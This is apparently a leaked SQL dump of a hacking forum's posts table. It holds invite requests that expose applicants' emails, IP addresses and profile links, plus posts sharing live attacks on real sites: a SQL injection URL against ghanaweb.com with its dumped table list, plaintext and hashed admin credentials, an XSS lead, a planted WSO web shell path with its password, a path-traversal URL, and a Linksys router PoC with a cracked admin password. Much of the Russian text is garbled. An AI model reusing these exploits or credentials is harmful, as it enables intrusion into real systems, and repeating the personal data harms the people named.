DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/candidjessica/status/213136909629792257 | https://twitter.com/candidjessica/status/213136909629792257 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1907, 1641, 0, 'Invite', 2, '{$name}', 1409790949, '[SIZE=\'4\'][COLOR=\'Sienna\']ZuCaris[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: None\n[b]e-mail[/b]: qaglleyv222@grr.la\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 192.227.237.124\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ink361.com/app/users/ig-253957893/.../following | http://ink361.com/app/users/ig-253957893/.../following \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1908, 1642, 0, 'Invite', 2, '{$name}', 1409816056, '[SIZE=\'4\'][COLOR=\'Sienna\']bhmanh[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: no hv\n[b]e-mail[/b]: buichucan@me.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 42.115.177.105\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.citeulike.org/user/UFGeog/author/Manh:BH | http://www.citeulike.org/user/UFGeog/author/Manh:BH \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1909, 1643, 0, 'Invite', 2, '{$name}', 1409833231, '[SIZE=\'4\'][COLOR=\'Sienna\']linkcabin[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: pbhd@jabber.ru\n[b]e-mail[/b]: linkcabin@gmail.com\n[b]Info[/b]: HF: http://www.hackforums.net/member.php?action=profile&uid=680866\r\n\r\nReputable member of HF.\r\n\r\nhttps://www.youtube.com/user/linksec/about\r\n\r\nDo research on various security subjects and had a 2.8k channel before YouTube brought it down (search \'linkcabin\')\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 2.96.124.230\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.virustotal.com/en/user/Linkcabin/ | https://www.virustotal.com/en/user/Linkcabin/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1910, 1612, 1833, 'unlog', 45, '', 1409852899, 'ýõòõрþÑÂтýþ ýþ фðúт: ýð 9000 ÿþрту ðÿðч ñõ÷ þóрðýøчõýøù ò ÿðÿúõ uploads :)\n_http://88.208.61.116:9000/upload/uploads/wso2.php\npassword = root\n\nÕщõ þôýð ÿþхþöðѠñðóð, ýþ уöõ ñõ÷ ûøÑÂтøýóð ôøрõúтþрøù (ôруóðѠþÑÂ?):\n_http://gdrive.pro/upload/\nphp ýð ÑÂтþт рð÷ тþчýþ üþöýþ ýõ ÷ðûøòðть:) ÑÂüþтрøтõ úþýфøó ýøöõ.\n\nÚþýфøó nginx:\n_http://gdrive.pro/upload/download.php?file=../../../../../../usr/local/etc/nginx/include/gdrive.conf\n\nßþöðûуùÑÂтð, ýõ òрõôøтõ ÑÂõрòõру ýð úþтþрþü шõû, тþ õÑÂть ôõфõùÑÂøть, уôðÃȄÂть чтþ-тþ ðôüøýÑÂúþõ ýõ ÑÂтþøт. áÿðÑÂøñþ.', 1, 0, '', 0, 1, 0, 0, 0), (1911, 1644, 0, 'Invite', 2, '{$name}', 1409865048, '[SIZE=\'4\'][COLOR=\'Sienna\']silent9[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: silent.9@outlook.com\n[b]e-mail[/b]: silent.9@outlook.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 195.180.11.247\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://silent9.deviantart.com | silent9.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1912, 1645, 0, 'kx00', 6, 'ghanaweb.com', 1409909840, '_ttp://www.ghanaweb.com/GhanaHomePage/soccer.PredictionLeague/index.php?cmd=showmonthlywinners&month=-24121\' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,user(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+--+\r\n\r\nalexa: 2.4ú ~200ú уýøúþò/ôõýь.\r\n50% трðффð USA.\r\n\r\nßутø: \r\nerror_log(/usr/www/users/rijk/logs/errorlog.html) \r\n/usr/www/users/rijk/ghanaweb/utils/error.php\r\n/usr/www/users/rijk/ghanaweb/\r\n\r\n[CODE]+-------------------------------+\r\n| BlackStars_Matches |\r\n| CLASSIFIED |\r\n| CLASSIFIED2 |\r\n| CLASSIFIED_COUNTRY |\r\n| CMS_PAGE |\r\n| GHANA2008 |\r\n| HOTEL |\r\n| JOKES |\r\n| MOVIE |\r\n| MOVIE_SURVEY |\r\n| PAGE_CACHE |\r\n| PAGE_CACHE2 |\r\n| PLAYERMATCH_RATING |\r\n| RADIO_STATION |\r\n| SAVED_EMAILS |\r\n| SPONSOR_SITE |\r\n| SPONSOR_SITE_VIEW |\r\n| STICKY_CLASSIFIED |\r\n| WORLD66 |\r\n| #mysql50#SP:ONSOR_SITE |\r\n| ts\\\\gsq_18525 |\r\n| ab_auth_user |\r\n| ab_records |\r\n| address_AdditionalData |\r\n| address_Address |\r\n| address_Contact |\r\n| address_Counter |\r\n| address_Country |\r\n| address_Email |\r\n| address_GroupList |\r\n| address_Groups |\r\n| address_Messaging |\r\n| address_Options |\r\n| address_OtherPhone |\r\n| address_Scratchpad |\r\n| address_Users * |\r\n| address_Websites |\r\n| answers |\r\n| bhfmagazine |\r\n| buteurs |\r\n| buts |\r\n| championnats |\r\n| clmnt |\r\n| clubs |\r\n| contact |\r\n| dictee |\r\n| dictee_resultaat |\r\n| dictee_resultaat_summary |\r\n| dictee_vraag |\r\n| divisions |\r\n| equipes |\r\n| faq_admins |\r\n| faq_banlist |\r\n| faq_bindata |\r\n| faq_category |\r\n| faq_category_admins |\r\n| faq_category_ref |\r\n| faq_comments |\r\n| faq_data |\r\n| faq_failed_logins |\r\n| faq_failed_notify |\r\n| faq_faq_keywords |\r\n| faq_faq_ref |\r\n| faq_freemailer |\r\n| faq_hostcache |\r\n| faq_iplog |\r\n| faq_kb_articles |\r\n| faq_kb_cat |\r\n| faq_kb_keywords |\r\n| faq_kb_os |\r\n| faq_kb_subcat |\r\n| faq_keywords |\r\n| faq_layout |\r\n| faq_misc |\r\n| faq_os |\r\n| faq_prog_os |\r\n| faq_programm |\r\n| faq_programm_admins |\r\n| faq_programm_version |\r\n| faq_questions |\r\n| faq_related_categories |\r\n| faq_related_faq |\r\n| faq_related_subcat |\r\n| faq_session |\r\n| faq_subcategory |\r\n| faq_texts |\r\n| fun_drlove |\r\n| geo_contacts |\r\n| joueurs |\r\n| journees |\r\n| matchs |\r\n| mysearch |\r\n| mysearch_scheduler |\r\n| mysearch_synonyms |\r\n| mysearch_work |\r\n| nigeriafilms |\r\n| old_players |\r\n| parametres |\r\n| people |\r\n| people2 |\r\n| photos |\r\n| phpCalendar_AdminSessions |\r\n| phpCalendar_AdminUsers |\r\n| phpCalendar_Config |\r\n| phpCalendar_Daily |\r\n| phpCalendar_Details |\r\n| phpCalendar_EventLocations |\r\n| phpCalendar_Locations |\r\n| phpCalendar_Monthly |\r\n| phpCalendar_PeriodicalMonthly |\r\n| phpCalendar_PeriodicalYearly |\r\n| phpCalendar_Weekly |\r\n| phpCalendar_Yearly |\r\n| pladdresslog |\r\n| players |\r\n| plcomps |\r\n| plconfigdata |\r\n| plgroups |\r\n| plgroupstandings |\r\n| pllids |\r\n| plmatchdata |\r\n| plmonthlywinner |\r\n| plmsgdata |\r\n| plppalpay |\r\n| plpredictiondata |\r\n| plprivleague |\r\n| plprivmembers |\r\n| plshout |\r\n| plstandings |\r\n| pluserdata |\r\n| pluserlids |\r\n| poll_comment |\r\n| poll_config |\r\n| poll_data |\r\n| poll_index |\r\n| poll_ip |\r\n| poll_log |\r\n| poll_templates |\r\n| poll_templateset |\r\n| poll_user |\r\n| questions |\r\n| saisons |\r\n| sections |\r\n| soccer_players |\r\n| tapis_vert |\r\n| test |\r\n| ts_answers |\r\n| ts_blackboard |\r\n| ts_categories |\r\n| ts_game_cats |\r\n| ts_game_question_cache_1 |\r\n| ts_game_sections |\r\n| ts_game_sessions |\r\n| ts_games |\r\n| ts_gsq_185 |\r\n| ts_gsq_18516 |\r\n| ts_gsq_18517 |\r\n| ts_gsq_18524 |\r\n| ts_gsq_18535 |\r\n| ts_gsq_18541 |\r\n| ts_option_groups |\r\n| ts_options |\r\n| ts_questions |\r\n| ts_template_cache |\r\n| ts_template_vars |\r\n| ts_templates |\r\n| ts_users |\r\n| type |\r\n+-------------------------------+[/CODE]\r\n\r\nÕÑÂть ÑÂúþñы ðôüøýúð \r\n_ttp://www.ghanaweb.com/GhanaHomePage/faq/admin/\r\n\r\n[CODE]tp_contents:DTymFWkh\r\nwmaster:nomorefufu (ÑÂÿðÑÂøñþ Kingbeef)[/CODE]\r\nÃÂþ тðü úðúøõ тþ трðñûы Ѡúþýýõúтþü. \r\n\r\n×òõрõù üðûþ. ~4ú. øýтõрõÑÂõý шõûû.', 1, 1, '', 0, 1, 0, 0, 0), (1913, 1645, 1912, 'kx00', 6, '', 1409909992, 'ð ôð xss) \n_ttp://www.ghanaweb.com/GhanaHomePage/education/browse2.php?begin=O
', 1, 1, '', 0, 1, 0, 0, 0), (1914, 1645, 1912, 'null', 9, '', 1409916713, 'hppp://www.ghanaweb.com/GhanaHomePage/games/admin/index.php\n\ndevel 1234\náтрðýýþ òÑÂõ ÑÂтþ òõ÷ôõ þшøñúø', 1, 0, '', 0, 1, 0, 0, 0), (1915, 1645, 1912, 'null', 9, '', 1409917080, 'hxxp://www.ghanaweb.com/law_cms/cm/edit.article.php', 1, 0, '', 0, 1, 0, 0, 0), (1916, 1646, 0, 'Invite', 2, '{$name}', 1409932765, '[SIZE=\'4\'][COLOR=\'Sienna\']orphdx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 1337\n[b]e-mail[/b]: orphdx@yahoo.com\n[b]Info[/b]: I am member of another forum, \r\n\r\nthis is my profile, check it \r\n\r\nhttps://rstforums.com/forum/members/fi8svrs/\r\n\r\nand you will see there my skills\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.13.93.43\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : orphdx : orphdx@yahoo.com : 5.13.94.46 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]E-Mail[/b] : orphdx@yahoo.com : orphdx : 5.13.94.46 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://eu.battle.net/d3/ru/profile/Hyperion-2514/.../27126770 | http://eu.battle.net/d3/ru/profile/Hyperion-2514/.../27126770 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1917, 1647, 0, 'Invite', 2, '{$name}', 1409932784, '[SIZE=\'4\'][COLOR=\'Sienna\']orphdx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 1337\n[b]e-mail[/b]: orphdx@yahoo.com\n[b]Info[/b]: I am member of another forum, \r\n\r\nthis is my profile, check it \r\n\r\nhttps://rstforums.com/forum/members/fi8svrs/\r\n\r\nand you will see there my skills\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.13.93.43\n[*][b]real ip[/b]: 5.13.93.43\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : orphdx : orphdx@yahoo.com : 5.13.94.46 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]E-Mail[/b] : orphdx@yahoo.com : orphdx : 5.13.94.46 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.4b42.com/US-de/user/profile.html?id=18479 | http://www.4b42.com/US-de/user/profile.html?id=18479 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1918, 1645, 1912, 'unlog', 45, '', 1409933824, 'WordPress 3.5.1\n_http://ehjuma.ghanaweb.com/ = /usr/www/users/rijkrr2/ghanaweb/ehjuma/\n_http://bibini.ghanaweb.com/ = /usr/www/users/rijkrr2/ghanaweb/bibini4gh/\n_http://ok.ghanaweb.com/ = /usr/www/users/rijkrr2/ghanaweb/okyeamekwame/\n\nõщõ ñõùÑÂøú:\n_http://ghanaweb.com/members/\n_http://ghanaweb.com/cms/\n_http://ghanaweb.com/convert/\n\nýð _http://discussions.ghanaweb.com/ õÑÂть ðôüøý wmaster,\nýðòõрýþ øüõõт ÑÂüыÑÂû ÿþøÑÂúðть ò ñð÷õ õщõ ÿðрþûø', 1, 0, '', 0, 1, 0, 0, 0), (1919, 1648, 0, 'w0rm', 1, 'Linksys Smart Wi-Fi Router EA6500', 1409938637, '# Wi-Fi Router EA3500\n[code]\n\n Linksys Smart Wi-Fi Router EA3500 / EA6500 VulnerabilitiesProduct: Linksys Smart Wi-Fi Router EA6500 \nFirmware: Version 1.1.29 (Build 162351) \n\nProduct: Linksys Smart Wi-Fi Router EA3500 \nFirmware: Version 1.1.39.145204 \n\nVulnerability type: Router password and system private information disclosure! \nSeverity: High (Critical) \n\nDetails: The vulnerability allows an attacker to read system private information, and get MD5(unix) encrypted administrator password, remotely. \n\nExploitation-Technique (POC): \nTarget: [URL]http://72.8.255.7/ui/dynamic/login.html[/URL] \n\n#Password disclosure \n$ wget [URL]http://72.8.255.7/.htpasswd[/URL] > password \n$ cat password \nadmin:$1$HrEMQi7U$/Ci6nHHLzVfMcwCk2mc23/ ( decrypted password: stefani1) \n\n#using brute force tools like hash cat, its possible to decrypt the password \n\n#System disclosure \n$ wget [URL]http://72.8.255.7/sysinfo.cgi[/URL] > system_information \n$ cat system_information \n\nCode:Vendor: LINKSYS \nModelName: EA3500 \n\nFirmware Version: 1.1.39.145204 \n\nFirmware Builddate: 2012-11-14 10:57 \nProduct.type: production \nLinux: Linux version 2.6.35.8 (root@hudson-node) (gcc version 4.2.0 20070413 (prerelease) (CodeSourcery Sourcery G++ Lite 2007q1-21)) #1 Wed Nov 14 02:31:16 PST 2012 \n\n\n[/code]', 1, 0, '', 0, 1, 0, 0, 0), (1920, 1649, 0, 'Invite', 2, '{$name}', 1409939218, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Email@s.com\n[b]e-mail[/b]: Email@s.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.165.222.246\n[*][b]real ip[/b]: 46.165.222.246\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140903 Firefox/24.0 Iceweasel/24.8.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1925, 1651, 0, 'Invite', 2, '{$name}', 1409940382, '[SIZE=\'4\'][COLOR=\'Sienna\']joao[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: -\n[b]e-mail[/b]: archivaldogm@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 181.31.176.6\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/minderico | https://twitter.com/minderico \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1936, 1655, 0, 'Invite', 2, '{$name}', 1410007333, '[SIZE=\'4\'][COLOR=\'Sienna\']alexalex[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: stru4xxt@exploit.im\n[b]e-mail[/b]: albert.petrov86@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 162.213.159.200\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : alexalex : alexdiestonight@safe-mail.net : : d6b56ef0c922e1b16ff81c833376fb77\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://alexalex.ru | alexalex.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1933, 1653, 0, 'Invite', 2, '{$name}', 1409954202, '[SIZE=\'4\'][COLOR=\'Sienna\']entr0py[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: entr0py@jabber.ru\n[b]e-mail[/b]: fake.guy@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 76.19.248.162\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/entr0pyteam | http://vk.com/entr0pyteam \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1934, 1654, 0, 'Invite', 2, '{$name}', 1409955345, '[SIZE=\'4\'][COLOR=\'Sienna\']mrkavka[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: nativ@exploit.im\n[b]e-mail[/b]: mrkavka@openmailbox.org\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.148.163.38\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://discussion.evernote.com/user/92606-mrkafka/ | https://discussion.evernote.com/user/92606-mrkafka/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1935, 1648, 1919, 'l3n0', 44, '', 1409983133, 'this is found by my friend [email]stdcall@jodo.im[/email]', 1, 0, '', 0, 1, 0, 0, 0), (1937, 1645, 1912, '123', 41, '', 1410009498, '[url]http://www.ghanaweb.com/GhanaHomePage/faq/admin/[/url]\ntp_contents:DTymFWkh\nwmaster:nomorefufu\n\n\n\nõщõ ðôüøýы\nadmin:934161ec95c5ed977ec88f1d0d40d1a6\nwmaster:cdce435ccea070a1a8dc218799d2e1a9\nAdmin:2628ds\ndevel:1234', 1, 0, '', 0, 1, 0, 0, 0), (1938, 1656, 0, 'Invite', 2, '{$name}', 1410010209, '[SIZE=\'4\'][COLOR=\'Sienna\']Malwin[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 